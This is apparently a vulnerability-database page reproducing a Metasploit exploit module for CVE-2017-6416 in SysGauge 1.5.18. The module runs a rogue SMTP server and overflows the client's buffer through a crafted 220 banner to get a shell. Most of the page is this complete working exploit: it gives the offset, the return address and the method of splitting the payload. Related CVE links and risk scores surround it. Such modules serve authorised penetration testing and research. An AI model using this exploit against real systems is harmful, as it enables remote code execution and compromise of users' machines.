Lucene search
K

SysGauge SMTP Validation Buffer Overflow

🗓️ 15 Mar 2017 04:29:19Reported by Chris Higgins, Peter BarisType 
metasploit
 metasploit
🔗 www.rapid7.com👁 28 Views

SysGauge SMTP Validation Buffer Overflow module exploits SysGauge 1.5.18 SMTP server validation, leading to unprivileged shell

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2017-6416
29 May 201815:50
circl
CNVD
SysGauge Buffer Overflow Vulnerability
2 Mar 201700:00
cnvd
CVE
CVE-2017-6416
6 Mar 201702:00
cve
Cvelist
CVE-2017-6416
6 Mar 201702:00
cvelist
NVD
CVE-2017-6416
6 Mar 201702:59
nvd
OSV
CVE-2017-6416
6 Mar 201702:59
osv
Prion
Buffer overflow
6 Mar 201702:59
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::TcpServer

  Rank = NormalRanking

  def initialize()
    super(
      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
      'Description'    => %q{
        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
        via its SMTP server validation. The module sends a malicious response along in the
        220 service ready response and exploits the client, resulting in an unprivileged shell.
      },
      'Author'         =>
      [
        'Chris Higgins', # msf Module -- @ch1gg1ns
        'Peter Baris'    # Initial discovery and PoC
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
      [
        [ 'CVE', '2017-6416' ],
        [ 'EDB', '41479' ],
      ],
      'DefaultOptions' =>
      {
        'EXITFUNC' => 'thread'
      },
      'Payload'        =>
      {
        'Space' => 306,
        'BadChars' => "\x00\x0a\x0d\x20"
      },
      'Platform'  => 'win',
      'Targets'       =>
      [
        [ 'Windows Universal',
          {
            'Offset' => 176,
            'Ret'    => 0x6527635E # call esp # QtGui4.dll
          }
        ]
      ],
      'Privileged'    => false,
      'DisclosureDate' => 'Feb 28 2017',
      'DefaultTarget' => 0
      )
    register_options(
      [
      OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
      ])
  end

  def on_client_connect(c)
    # Note here that the payload must be split into two parts.
    # The payload gets jumbled in the stack so we need to split
    # and align to get it to execute correctly.
    sploit =  "220 "
    sploit << rand_text(target['Offset'])
    # Can only use the last part starting from 232 bytes in
    sploit << payload.encoded[232..-1]
    sploit << rand_text(2)
    sploit << [target.ret].pack('V')
    sploit << rand_text(12)
    sploit << make_nops(8)
    # And the first part up to 232 bytes
    sploit << payload.encoded[0..231]
    sploit << "ESMTP Sendmail \r\n"

    print_status("Client connected: " + c.peerhost)
    print_status("Sending payload...")

    c.put(sploit)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jul 2018 22:34Current
1.1Low risk
Vulners AI Score1.1
CVSS 27.5
CVSS 39.8
EPSS0.1077
28